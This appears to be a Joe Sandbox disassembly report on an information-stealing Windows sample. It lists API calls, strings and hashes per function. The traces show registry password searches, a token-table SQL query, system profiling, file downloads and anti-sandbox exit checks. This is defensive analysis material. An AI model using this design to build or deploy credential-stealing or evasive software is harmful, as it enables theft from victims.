Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: b5dd5a892691c8118ba4bf5e458b408446a883125d282d1bb6db0f1ba049c6b0
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: b5dd5a892691c8118ba4bf5e458b408446a883125d282d1bb6db0f1ba049c6b0
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74
c.A, xrefs: 00404CC1, 00404DA0

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: 4c32f368c5df7ae70178bca9b48ed87a86d983b92ac5f118d0c31052e40feb90
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: 4c32f368c5df7ae70178bca9b48ed87a86d983b92ac5f118d0c31052e40feb90
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

C, xrefs: 004141E9
\, xrefs: 004141FD
:, xrefs: 004141F9

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 3700988fa772d819c3f78461e951c79785b81192d42974e296d3322cd9332897
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 3700988fa772d819c3f78461e951c79785b81192d42974e296d3322cd9332897
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04285D90,00000000,?,0041D774,00000000,?,00000000,00000000,?,04285E38), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

%d MB, xrefs: 004149E0
@, xrefs: 0041498A

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,042805E0), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: a3b106a3439e56f158aefc4a466601c817c1ea1393b3af76710c3a74193e1371
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: a3b106a3439e56f158aefc4a466601c817c1ea1393b3af76710c3a74193e1371
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: c853e67d5c1e0e6b2ba4b799c7a1165c84a14470cc03d0f55a92e20261eea37a
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: c853e67d5c1e0e6b2ba4b799c7a1165c84a14470cc03d0f55a92e20261eea37a
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B28A
AccountId, xrefs: 0040B472
AccountTokens, xrefs: 0040B319

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 368179b23f27c541524ee7e9d46f077388f9073aecdaebda06e2dd2fd8afc027
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 368179b23f27c541524ee7e9d46f077388f9073aecdaebda06e2dd2fd8afc027
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263A68), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,042638D0), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263930), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,042639C0), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263AC8), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,042803E0), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04264020), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263F40), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263A80), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263918), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263948), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04280978), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04263FE0), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,042808B8), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04280330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04280410,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,04280410,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: c031cb388eb16db84b4e17eda59912c30a4eaa61045a9b32ec09d4dd9e11a8dd
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: c031cb388eb16db84b4e17eda59912c30a4eaa61045a9b32ec09d4dd9e11a8dd
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04286348,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,04286318,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: e28842606301cc07ae1e185a85ccdaaee69db1e07d674bf10f87e1204adbb805
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: e28842606301cc07ae1e185a85ccdaaee69db1e07d674bf10f87e1204adbb805
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04286730,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,04287F58,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,04287DD8), ref: 00411E2B

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287248,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
